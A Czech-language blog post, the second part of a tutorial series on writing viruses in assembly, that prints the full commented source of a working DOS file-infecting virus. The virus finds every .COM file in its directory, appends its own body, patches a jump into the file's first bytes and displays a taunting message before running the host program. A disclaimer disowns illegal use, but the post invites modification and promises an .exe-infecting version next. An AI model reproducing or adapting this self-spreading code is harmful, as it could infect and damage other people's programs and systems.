Hledání

Kategorie

Odkazy

Nástroje

Archiv

Jednoduchy vir

Jednoduchy vir

Tento článek rozhodně nemá za cíl nabádat vás k nějaké nezákonné, nebo nemorální
činnosti!!
Jak naprogramovat jednoduchý vir (2)
V tomto seriálu se dozvíte, jak dělat v assembleru jednoduché viry. V tomto díle
se konečně setkáme s primitivním, avšak fungujícím virem.

Pro zvládnutí článku předpokládám alespoň základní znalost assembleru a znalost
obsahu prvního dílu seriálu. Také se budou hodit nějaké obecné vědomosti o virech.

A nyní již slibovaný vir. Jedná se o můj vir D-primitive_nice, upravený kód
podobného charakteru. Jedná se o jednorázový souborový nepřepisující vir, který
infikuje všechny soubory *.com v adresáři, ve kterém je spuštěn. Vir nejdříve
najde vhodný *.com v adresáři, zálohuje prvních několik bytů, přepíše je jumpem
na konec programu. Tam pak zapíše vlastní tělo viru včetně oněch několika
zálohovaných počátečních bytů. Takový zavirovaný program poté po spuštění skočí
hnedka na tělo viru, vykoná ho a poté v paměti zkopíruje zálohované byty na
původní místo a skočí na ně a vykoná původní program.

Zde je okomentovaný zdrojový kód:

ORG 100h ; bez tohohle by to opět nešlo
jmp @start ; skoč na start
db 0FFh ; aby měl i infektor jiných 5 bytů
db ´DM´ ; značka, že jde o injektor (brání několikanásobné infekci, u skutečného
viru by bylo řešeno lépe)
@start: mov ax,4E00h ; fce najdi první soubor
mov dx,@com ; adresa názvu souboru (v našem případě *.com)
int 21h ; přerušení Funkce DOSu
jc @konec ; pokud CF=1, vyskytla se chyba nebo nebyl žádný soubor nalezen ->
skoč na konec
jmp @otevri ; jinak skoč na otevírání souboru
@dalsi: mov ax,4F00h ; fce najdi další soubor
mov dx,80h ; adresa implicitní DTA
int 21h
jc @konec
@otevri: mov ax,3D12h ; fce otevři soubor
mov dx,009Eh ; adresa jména nalezeného souboru v DTA
int 21h
jc @zavri ; pokud chyba, zavři soubor
mov [cs:@handle],ax ; ulož handle souboru
mov ax,3F00h ; fce čti ze souboru (načteme prvních 5 bytů)
mov bx,[cs:@handle] ; handle
mov dx,@c_old5b ; adresa našeho bufferu pro data
mov cx,0005h ; kolik bytů se bude číst
int 21h
jc @zavri
cmp word [cs:@c_old5b+3],´DP´ ; pokud je náš soubor již
jz @zavri ; infikovaný
cmp word [cs:@c_old5b+3],´DM´ ; nebo infektor
jz @zavri ; -> ukonči infekci
mov ax,4202h ; fce nastav pozici v souboru na konec + CX:DX
xor cx,cx
xor dx,dx
int 21h
jc @zavri
sub ax,0003h ; odečti délku instrukce jmp
mov word [cs:@new5b+1],ax ; ulož velikost relativního skoku
mov ax,4000h ; fce piš do souboru
mov cx,@c_konec-@code ; počet bytů k zápisu
mov dx,@code ; adresa zdroje kopírování
int 21h
jc @zavri
mov ax,4200h ; pozice na začátek + CX:DX (0)
xor cx,cx
xor dx,dx
int 21h
jc @zavri
mov ax,4000h ; přepíšeme prvních 5 bytů souboru
mov cx,0005h
mov dx,@new5b ; adresa bufferu
int 21h
@zavri: mov ax,3E00h ; fce zavři soubor
int 21h
jmp @dalsi ; skoč na hledání dalšího souboru
@konec: int 20h ; konec
@com db ´*.com´,0 ; název pro hledání souboru
@handle dw 0 ; buffer pro handle
@new5b db 0E9h,0,0,´DP´ ; buffer nových 5 bytů (skok + id infikovaného souboru)
@code: mov si,word [cs:0101h] ; kód kopírovaný do souborů
add si,0103h
mov ax,0900h ; fce vypiš text
mov dx,si ; adresa těla viru v souboru
add dx,@c_text-@code ; přičti adresu textu od začátku těla viru
int 21h
xor ax,ax ; čekej dokud nebude stisknuta
int 16h ; klávesa
mov di,0100h
add si,@c_old5b-@code ; adresa starých 5 bytů v souboru
movsw ; zkopíruj 5 bytů zpět na začátek
movsw
movsb
push 0100h
ret ; skoč na začátek souboru
@c_old5b db 0,0,0,0,0 ; buffer na prvních 5 bytů
@c_text db ´This program is mine! Muuhahaha!´,13,10,´$´ ; text
@c_konec: ; ukazatel na konec souboru


– pozn.: některé antiviry můžou tento virus označit za virus Trivial (souhrnné
označení primitivních virů)

Tak to by bylo pro dnešek asi vše. Tělo viru můžete pro studijní účely
upravovat, ovšem na vlastní nebezpečí. Příště zkusíme zkonstruovat podobný
virus, který by dokázal infikovat také *.exe soubory.

Ricrdsson | 03.1.2009, 20:54 | trvalý odkaz

Komentáře:

Autor:
E-mail: WWW:
Obsah příspěvku:

[ANTISPAM] 2+2=  

Běží na blogovacím systému Xicht.cz